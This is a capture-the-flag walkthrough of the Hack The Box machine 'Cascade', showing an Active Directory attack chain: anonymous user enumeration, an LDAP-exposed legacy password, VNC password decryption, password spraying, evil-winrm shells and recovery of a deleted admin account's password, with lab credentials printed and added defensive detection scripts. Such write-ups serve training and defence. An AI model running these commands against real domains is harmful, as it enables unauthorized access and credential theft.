Cascade

Enumeration
As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions behind them.
The following nmap command scans the target quickly for open ports and saves the output to a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.182 -oN allPorts
-sS: use the TCP SYN scan option. This scan is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of the nmap timing templates.
-Pn: assume the host is online and skip host discovery.
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case the allPorts file.
# Nmap 7.93 scan initiated Mon Apr 3 09:30:08 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.053s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49170/tcp open unknown
# Nmap done at Mon Apr 3 09:30:34 2023 -- 1 IP address (1 host up) scanned in 26.48 seconds
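Moving from the full-range scan to the targeted scan means lifting the open ports out of the allPorts file by hand. The script below is an added example, not part of the original writeup: it parses an nmap -oN report (a constructed excerpt of the scan above, with one closed port added to show the filtering) and builds the comma-separated -p argument for the second scan. It also lists the ports nmap could only label "unknown", which are exactly the ones that depend on -sV to be identified.

```python
import re
from typing import Dict, List

# Sample input (constructed excerpt): lines copied from the allPorts report above,
# plus one closed port added to show that only "open" lines are kept.
SAMPLE_REPORT = """# Nmap 7.93 scan initiated Mon Apr 3 09:30:08 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.053s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT      STATE  SERVICE
53/tcp    open   domain
80/tcp    closed http
88/tcp    open   kerberos-sec
135/tcp   open   msrpc
389/tcp   open   ldap
445/tcp   open   microsoft-ds
5985/tcp  open   wsman
49154/tcp open   unknown
# Nmap done at Mon Apr 3 09:30:34 2023 -- 1 IP address (1 host up) scanned in 26.48 seconds
"""

# One port line: "<port>/<proto> <state> <service>"; header and comment lines do not match.
PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_open_ports(report: str) -> Dict[int, str]:
    """Return {port: service_guess} for every port the -oN report lists as open."""
    found: Dict[int, str] = {}
    for line in report.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(3) == "open":
            found[int(m.group(1))] = m.group(4)
    return found


def port_argument(ports: Dict[int, str]) -> str:
    """Comma-separated port list for the follow-up -sC -sV scan."""
    return ",".join(str(p) for p in sorted(ports))


def unnamed_ports(ports: Dict[int, str]) -> List[int]:
    """Ports nmap could only label 'unknown'; -sV is the only way to identify these."""
    return sorted(p for p, svc in ports.items() if svc == "unknown")


if __name__ == "__main__":
    open_ports = parse_open_ports(SAMPLE_REPORT)
    print("nmap -sC -sV -p" + port_argument(open_ports) + " 10.10.10.182 -oN targeted")
    print("unnamed:", unnamed_ports(open_ports))
```

The service column of a SYN scan is only a lookup in nmap's port table, which is why the 49xxx RPC endpoints show up as unknown; nothing on the wire has been inspected yet.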
Now that we know which ports are open, let's identify the services and versions running on them. The following command scans these ports in more depth and saves the result to a file:
nmap -sC -sV -p53,88,135,139,389,445,636,3268,3269,5985,49154,49155,49157,49158,49170 10.10.10.182 -oN targeted
-sC: run the default set of nmap scripts.
-sV: enable service version detection.
-oN: save the scan result into a file, in this case the targeted file.
# Nmap 7.93 scan initiated Mon Apr 3 09:32:04 2023 as: nmap -sCV -p53,88,135,139,389,445,636,3268,3269,5985,49154,49155,49157,49158,49170 -Pn -n -oN targeted 10.10.10.182
Nmap scan report for 10.10.10.182
Host is up (0.042s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-03 07:32:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 210:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-04-03T07:33:05
|_ start_date: 2023-04-03T07:28:59
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 3 09:33:41 2023 -- 1 IP address (1 host up) scanned in 96.79 seconds
The machine is most likely a domain controller (DNS, Kerberos, LDAP and SMB are all exposed), and, as crackmapexec confirms, the domain name is cascade.local.
crackmapexec smb 10.10.10.182
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
Let's add it to the /etc/hosts file.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
f02::2 ip6-allrouters
10.10.10.182 cascade.local
We can get a list of domain users with rpcclient over a null session.
rpcclient -N -U '' 10.10.10.182 -c "enumdomusers" | grep -oP '\[.*\]' | awk '{print $1}' | tr -d "[]" > users
CascGuest
arksvc
s.smith
r.thompson
util
j.wakefield
s.hickson
j.goodhand
a.turnbull
e.crowe
b.hanson
d.burman
BackupSvc
j.allen
i.croft
Exploitation
As port 389 is open, let's enumerate the DC via the LDAP service.
ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=person)'
...
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20230403090010.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 340120
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247339091081169
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 133249860104354812
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
...
The r.thompson user has an attribute called cascadeLegacyPwd whose value is a base64-encoded password.
echo 'clk0bjVldmE=' | base64 -d; echo
rY4n5eva
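cascadeLegacyPwd is not a standard Active Directory attribute; it is a schema extension someone added, and any authenticated user (here, even an anonymous bind) can read it. From a defender's side, the useful check is to sweep an LDAP export for attributes outside the expected set whose values decode from base64 into printable text, and to decode userAccountControl while at it (66048 is NORMAL_ACCOUNT plus DONT_EXPIRE_PASSWORD, so the leaked password never rotates). The script below is an added example, not part of the original writeup; the LDIF sample is a trimmed copy of the r.thompson entry above plus a second, made-up entry, and the KNOWN_ATTRS allowlist is an assumption chosen for this example.

```python
import base64
import re
import string
from typing import Dict, List, Tuple

# Constructed sample: a trimmed copy of the r.thompson entry from the ldapsearch output above,
# plus a second entry (made up for this example) that carries no custom attribute.
SAMPLE_LDIF = """# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
cn: Ryan Thompson
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
userAccountControl: 66048
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
sAMAccountName: r.thompson
userPrincipalName: r.thompson@cascade.local
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=Example User,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
cn: Example User
userAccountControl: 512
sAMAccountName: example.user
"""

# userAccountControl bits that matter for a password-hygiene review.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}

# Attributes a plain user object is expected to carry (assumed allowlist); anything else is reviewed.
KNOWN_ATTRS = {"dn", "objectClass", "cn", "sn", "givenName", "displayName", "name", "memberOf",
               "userAccountControl", "objectGUID", "objectSid", "sAMAccountName", "userPrincipalName"}

# "attr: value" is a plain value, "attr:: value" is LDIF's own base64 encoding of a binary value.
ATTR_LINE = re.compile(r"^([A-Za-z][\w.-]*)(::?)\s?(.*)$")

Entry = Dict[str, List[Tuple[str, bool]]]


def parse_ldif(text: str) -> List[Entry]:
    """Split LDIF into entries: {attribute: [(value, ldif_base64_flag), ...]}."""
    unfolded: List[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:
            unfolded[-1] += raw[1:]          # LDIF folds long lines with a leading space
        else:
            unfolded.append(raw)
    entries: List[Entry] = []
    current: Entry = {}
    for line in unfolded + [""]:           # sentinel blank line flushes the last entry
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        m = ATTR_LINE.match(line)
        if m:
            attr, sep, value = m.groups()
            current.setdefault(attr, []).append((value, sep == "::"))
    return entries


def decode_uac(value: int) -> List[str]:
    """Names of the set userAccountControl bits, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def looks_like_text(data: bytes) -> bool:
    """True when every byte is printable ASCII, i.e. plausibly a password rather than a GUID or SID."""
    printable = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
    return len(data) >= 4 and all(b in printable for b in data)


def find_suspect_attributes(entries: List[Entry]) -> List[Tuple[str, str, str]]:
    """(account, attribute, decoded text) for non-standard attributes holding base64 of printable text."""
    findings = []
    for entry in entries:
        account = entry.get("sAMAccountName", [("?", False)])[0][0]
        for attr, values in entry.items():
            if attr in KNOWN_ATTRS:
                continue
            for value, _ in values:
                try:
                    decoded = base64.b64decode(value, validate=True)
                except ValueError:             # not base64, nothing to decode
                    continue
                if looks_like_text(decoded):
                    findings.append((account, attr, decoded.decode("ascii")))
    return findings


if __name__ == "__main__":
    entries = parse_ldif(SAMPLE_LDIF)
    for entry in entries:
        print(entry["sAMAccountName"][0][0], decode_uac(int(entry["userAccountControl"][0][0])))
    print(find_suspect_attributes(entries))
```

Note the difference between the two colon forms: objectGUID:: is LDIF telling you the value is binary and has been base64-wrapped by the exporter, whereas cascadeLegacyPwd: is a plain string attribute whose content merely happens to be base64. The first is normal; the second is the finding.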
Now we could try to enumerate SMB shares with these credentials.
crackmapexec smb 10.10.10.182 -u 'r.thompson' -p 'rY4n5eva' --shares
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SMB 10.10.10.182 445 CASC-DC1 [+] Enumerated shares
SMB 10.10.10.182 445 CASC-DC1 Share Permissions Remark
SMB 10.10.10.182 445 CASC-DC1 ----- ----------- ------
SMB 10.10.10.182 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.10.10.182 445 CASC-DC1 Audit$
SMB 10.10.10.182 445 CASC-DC1 C$ Default share
SMB 10.10.10.182 445 CASC-DC1 Data READ
SMB 10.10.10.182 445 CASC-DC1 IPC$ Remote IPC
SMB 10.10.10.182 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.10.10.182 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.10.10.182 445 CASC-DC1 SYSVOL READ Logon server share
We can read the Data share. Let's mount it on our local system.
mkdir /mnt/Data
mount -t cifs //10.10.10.182/Data /mnt/Data/ -o username=r.thompson,password=rY4n5eva,domain=cascade.local,rw
The Data share has a few files.
tree -fas /mnt/Data
[ 4096] /mnt/Data
├── [ 0] /mnt/Data/Contractors
├── [ 0] /mnt/Data/Finance
├── [ 0] /mnt/Data/IT
│ ├── [ 0] /mnt/Data/IT/Email Archives
│ │ └── [ 2522] /mnt/Data/IT/Email Archives/Meeting_Notes_June_2018.html
│ ├── [ 0] /mnt/Data/IT/LogonAudit
│ ├── [ 0] /mnt/Data/IT/Logs
│ │ ├── [ 0] /mnt/Data/IT/Logs/Ark AD Recycle Bin
│ │ │ └── [ 1303] /mnt/Data/IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log
│ │ └── [ 0] /mnt/Data/IT/Logs/DCs
│ │ └── [ 5967] /mnt/Data/IT/Logs/DCs/dcdiag.log
│ └── [ 0] /mnt/Data/IT/Temp
│ ├── [ 0] /mnt/Data/IT/Temp/r.thompson
│ └── [ 0] /mnt/Data/IT/Temp/s.smith
│ └── [ 2680] /mnt/Data/IT/Temp/s.smith/VNC Install.reg
├── [ 0] /mnt/Data/Production
└── [ 0] /mnt/Data/Temps
14 directories, 4 files
The most interesting one is Meeting_Notes_June_2018.html, which says that the TempAdmin account had the same password as the administrator account.
cat /mnt/Data/IT/Email\ Archives/Meeting_Notes_June_2018.html
<html>
...
<p>For anyone that missed yesterday’s meeting (I’m looking at
you Ben). Main points are below:</p>
<p class=MsoNormal><o:p> </o:p></p>
<p>-- New production network will be going live on
Wednesday so keep an eye out for any issues. </p>
<p>-- We will be using a temporary account to
perform all tasks related to the network migration and this account will be deleted at the end of
2018 once the migration is complete. This will allow us to identify actions
related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password). </p>
<p>-- The winner of the “Best GPO” competition will be
announced on Friday so get your submissions in soon.</p>
<p class=MsoNormal><o:p> </o:p></p>
<p class=MsoNormal>Steve</p>
...
</html>
Also interesting is the VNC Install.reg file, stored under s.smith's Temp folder, which seems to hold a hex-encoded VNC password.
cat /mnt/Data/IT/Temp/s.smith/VNC\ Install.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
...
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
...
TightVNC stores this password DES-encrypted with a fixed, publicly known key, so it can be recovered with the following command, found online:
echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
00000000 73 54 33 33 33 76 65 32 |sT333ve2|
00000008
We have a password, but we don't know which user it belongs to. Let's spray it across all the users we found earlier.
crackmapexec smb 10.10.10.182 -u users -p 'sT333ve2'
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\CascGuest:sT333ve2 STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\arksvc:sT333ve2 STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\s.smith:sT333ve2
The password is valid for the s.smith user, who must be a member of the Remote Management Users group, since we can get a shell with evil-winrm and take the user flag.
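On the domain controller, the spray above leaves one failed logon (event 4625) per account from a single source in a few seconds, followed by one success (4624) for s.smith. Lockout thresholds do not fire on that pattern, because no single account fails more than once; the signal is the number of distinct accounts per source. The detector below is an added example, not part of the original writeup, run over a constructed set of simplified 4625/4624 events (the source addresses, timestamps and the b.hanson noise events are made up).

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample: a simplified subset of Windows Security events 4625 (failed logon)
# and 4624 (successful logon) as a DC would record the spray above. Source address,
# timestamps and the extra b.hanson events are made up for this example.
EVENTS: List[Dict] = [
    {"time": "2023-04-03T09:41:00", "id": 4625, "user": "CascGuest",   "src": "10.10.14.5"},
    {"time": "2023-04-03T09:41:01", "id": 4625, "user": "arksvc",      "src": "10.10.14.5"},
    {"time": "2023-04-03T09:41:01", "id": 4624, "user": "s.smith",     "src": "10.10.14.5"},
    {"time": "2023-04-03T09:41:02", "id": 4625, "user": "r.thompson",  "src": "10.10.14.5"},
    {"time": "2023-04-03T09:41:02", "id": 4625, "user": "util",        "src": "10.10.14.5"},
    {"time": "2023-04-03T09:41:03", "id": 4625, "user": "j.wakefield", "src": "10.10.14.5"},
    # Ordinary noise: one person mistyping a password twice from another host.
    {"time": "2023-04-03T09:41:10", "id": 4625, "user": "b.hanson",    "src": "10.10.14.9"},
    {"time": "2023-04-03T09:41:40", "id": 4625, "user": "b.hanson",    "src": "10.10.14.9"},
]

FAILED_LOGON, SUCCESSFUL_LOGON = 4625, 4624


def detect_spray(events: List[Dict], window_seconds: int = 60, min_accounts: int = 5) -> List[Dict]:
    """Flag a source that fails against at least min_accounts distinct accounts inside one window.

    A lockout counter never fires on a spray (one failure per account), so the signal is
    breadth of accounts per source, not depth of failures per account. Successes from the
    same source in the same window are reported as the accounts that now need a reset."""
    by_src: Dict[str, list] = defaultdict(list)
    for e in events:
        by_src[e["src"]].append((datetime.fromisoformat(e["time"]), e["id"], e["user"]))
    alerts = []
    for src, evs in by_src.items():
        evs.sort()
        for i, (t0, _, _) in enumerate(evs):
            window = [ev for ev in evs[i:] if ev[0] - t0 <= timedelta(seconds=window_seconds)]
            failed = {u for _, eid, u in window if eid == FAILED_LOGON}
            if len(failed) >= min_accounts:
                succeeded = sorted({u for _, eid, u in window if eid == SUCCESSFUL_LOGON})
                alerts.append({"src": src, "failed_accounts": len(failed),
                               "window_start": t0.isoformat(), "succeeded": succeeded})
                break                      # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(EVENTS):
        print(alert)
```

The threshold and window are tuning knobs: five distinct accounts in a minute from one address is well outside what a help desk or a single user produces, while the repeated b.hanson failures from the second host stay below it because they involve one account.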
evil-winrm -i 10.10.10.182 -u 's.smith' -p 'sT333ve2'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> whoami
cascade\s.smith
*Evil-WinRM* PS C:\Users\s.smith\Documents> type \users\s.smith\desktop\user.txt
5c9642f15b39fb3be3360bf930421fbe
Privilege Escalation
This user has access to one more SMB share, called Audit$.
crackmapexec smb 10.10.10.182 -u 's.smith' -p 'sT333ve2' --shares
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\s.smith:sT333ve2
SMB 10.10.10.182 445 CASC-DC1 [+] Enumerated shares
SMB 10.10.10.182 445 CASC-DC1 Share Permissions Remark
SMB 10.10.10.182 445 CASC-DC1 ----- ----------- ------
SMB 10.10.10.182 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.10.10.182 445 CASC-DC1 Audit$ READ
SMB 10.10.10.182 445 CASC-DC1 C$ Default share
SMB 10.10.10.182 445 CASC-DC1 Data READ
SMB 10.10.10.182 445 CASC-DC1 IPC$ Remote IPC
SMB 10.10.10.182 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.10.10.182 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.10.10.182 445 CASC-DC1 SYSVOL READ Logon server share
Let's mount it to our local system.
mkdir /mnt/Audit$
mount -t cifs //10.10.10.182/Audit$ /mnt/Audit$/ -o username=s.smith,password=sT333ve2,domain=cascade.local,rw
The share holds what look like the files the CascAudit.exe binary needs in order to run.
tree -fas /mnt/Audit$/
[ 4096] /mnt/Audit$
├── [ 13312] /mnt/Audit$/CascAudit.exe
├── [ 12288] /mnt/Audit$/CascCrypto.dll
├── [ 0] /mnt/Audit$/DB
│ └── [ 24576] /mnt/Audit$/DB/Audit.db
├── [ 45] /mnt/Audit$/RunAudit.bat
├── [ 363520] /mnt/Audit$/System.Data.SQLite.dll
├── [ 186880] /mnt/Audit$/System.Data.SQLite.EF6.dll
├── [ 0] /mnt/Audit$/x64
│ └── [ 1639936] /mnt/Audit$/x64/SQLite.Interop.dll
└── [ 0] /mnt/Audit$/x86
└── [ 1246720] /mnt/Audit$/x86/SQLite.Interop.dll
4 directories, 8 files
There is one .db file, which is an SQLite 3 database.
file /mnt/Audit$/DB/Audit.db
/mnt/Audit$/DB/Audit.db: SQLite 3.x database, last written using SQLite version 3027002, file counter 60, database pages 6, 1st free page 6, free pages 1, cookie 0x4b, schema 4, UTF-8, version-valid-for 60
The database has three tables, and the Ldap table holds one base64-encoded password for the ArkSvc user.
sqlite3 /mnt/Audit$/DB/Audit.db
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit Ldap Misc
sqlite> select * from DeletedUserAudit;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
sqlite> select * from Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> select * from Misc;
sqlite>
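An audit tool's database sitting on a readable share is itself a finding: it records which objects were tombstoned (the DN of a deleted object is rewritten to CN=<name>\0ADEL:<objectGUID>,CN=Deleted Objects,..., where \0A is the escaped newline AD inserts) and it stores a service-account password in a reversible form. The script below is an added example, not part of the original writeup: it rebuilds the three tables in memory from the rows in the dump (the column names are an assumption, since the dump shows values only), extracts the original names and GUIDs from the tombstone DNs, and checks that the decoded Ldap value is a whole number of 16-byte blocks, which is what CBC-mode AES output looks like and is consistent with what the decompiled DLL shows later.

```python
import base64
import re
import sqlite3
from typing import List, Optional, Tuple

# Rows copied from the Audit.db dump above. The dump shows values only, so the column
# names used here are an assumption made for this example, not the real schema.
DELETED_USER_ROWS = [
    (6, "test", "Test\nDEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d",
     "CN=Test\\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local"),
    (7, "deleted", "deleted guy\nDEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef",
     "CN=deleted guy\\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local"),
    (9, "TempAdmin", "TempAdmin\nDEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a",
     "CN=TempAdmin\\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local"),
]
LDAP_ROWS = [(1, "ArkSvc", "BQO5l5Kj9MdErXx6Q6AGOw==", "cascade.local")]

# AD renames a deleted object to "<name>\nDEL:<objectGUID>"; in a DN the newline is escaped as \0A.
DELETED_DN = re.compile(
    r"^CN=(.+?)\\0ADEL:([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}),CN=Deleted Objects,", re.I)

AES_BLOCK = 16


def build_sample_db() -> sqlite3.Connection:
    """In-memory copy of the three tables, populated with the rows from the dump."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE DeletedUserAudit (Id INTEGER PRIMARY KEY, Username TEXT, Name TEXT, DistinguishedName TEXT);
        CREATE TABLE Ldap (Id INTEGER PRIMARY KEY, Uname TEXT, Pwd TEXT, Domain TEXT);
        CREATE TABLE Misc (Id INTEGER PRIMARY KEY, Ext1 TEXT, Ext2 TEXT);
    """)
    conn.executemany("INSERT INTO DeletedUserAudit VALUES (?, ?, ?, ?)", DELETED_USER_ROWS)
    conn.executemany("INSERT INTO Ldap VALUES (?, ?, ?, ?)", LDAP_ROWS)
    conn.commit()
    return conn


def parse_deleted_dn(dn: str) -> Optional[Tuple[str, str]]:
    """(original CN, objectGUID) of a tombstoned object, or None if the DN is not a deleted object."""
    m = DELETED_DN.match(dn)
    return (m.group(1), m.group(2).lower()) if m else None


def stored_credentials(conn: sqlite3.Connection) -> List[Tuple[str, str, bytes]]:
    """(account, domain, ciphertext) per Ldap row; base64 only wraps the bytes, it is not the protection."""
    rows = conn.execute("SELECT Uname, Domain, Pwd FROM Ldap").fetchall()
    return [(u, d, base64.b64decode(p)) for u, d, p in rows]


def looks_like_block_cipher_output(ciphertext: bytes) -> bool:
    """CBC output with padding is always a whole number of 16-byte AES blocks."""
    return len(ciphertext) > 0 and len(ciphertext) % AES_BLOCK == 0


def deleted_accounts(conn: sqlite3.Connection) -> List[Tuple[str, str]]:
    """Original names and GUIDs of every tombstone the audit tool recorded."""
    found = []
    for (dn,) in conn.execute("SELECT DistinguishedName FROM DeletedUserAudit"):
        parsed = parse_deleted_dn(dn)
        if parsed:
            found.append(parsed)
    return found


if __name__ == "__main__":
    db = build_sample_db()
    for account, domain, ct in stored_credentials(db):
        print(f"{domain}\\{account}: {len(ct)}-byte ciphertext, block-aligned={looks_like_block_cipher_output(ct)}")
    print(deleted_accounts(db))
```

The 16-byte length says nothing about the key, only that the value is one padded block; the actual weakness is that the key and IV live in a binary on the same share, so anyone who can read the share can undo the encryption, which is what the rest of the writeup does.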
But the password seems to be encrypted.
echo 'BQO5l5Kj9MdErXx6Q6AGOw==' | base64 -d; echo
������D�|zC�;
Let's decompile the CascAudit.exe binary with dotPeek to recover its source code and see what it does. Transfer CascAudit.exe and CascCrypto.dll to a Windows machine with dotPeek installed, and open both files with it.

The CascAudit.exe source code contains a hardcoded key that is used to encrypt and decrypt passwords.

The CascCrypto.dll source code, in turn, shows that passwords are encrypted with AES in CBC mode using a hardcoded IV.

We can use an online tool such as devglan.com to decrypt the password found in the database with that IV and secret key.

Let's use these credentials to get a shell as arksvc.
evil-winrm -i 10.10.10.182 -u 'arksvc' -p 'w3lc0meFr31nd'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami
cascade\arksvc
As the output of net user shows, the arksvc user is a member of the AD Recycle Bin group, which grants permission to read deleted AD objects.
net user arksvc
User name arksvc
Full Name ArkSvc
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 5:18:20 PM
Password expires Never
Password changeable 1/9/2020 5:18:20 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/3/2023 11:05:50 AM
Logon hours allowed All
Local Group Memberships *AD Recycle Bin *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
Let's list deleted AD objects with the following command. One of them carries a base64-encoded password for the TempAdmin user.
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
...
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
...
Decode the base64 string to get the password.
echo 'YmFDVDNyMWFOMDBkbGVz' | base64 -d; echo
baCT3r1aN00dles
If you remember, a note in the Data share said the password of the TempAdmin user was the same as the administrator's. So we can get a shell as administrator, and then all that is left is to reap the harvest and take the root flag.
evil-winrm -i 10.10.10.182 -u 'administrator' -p 'baCT3r1aN00dles'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
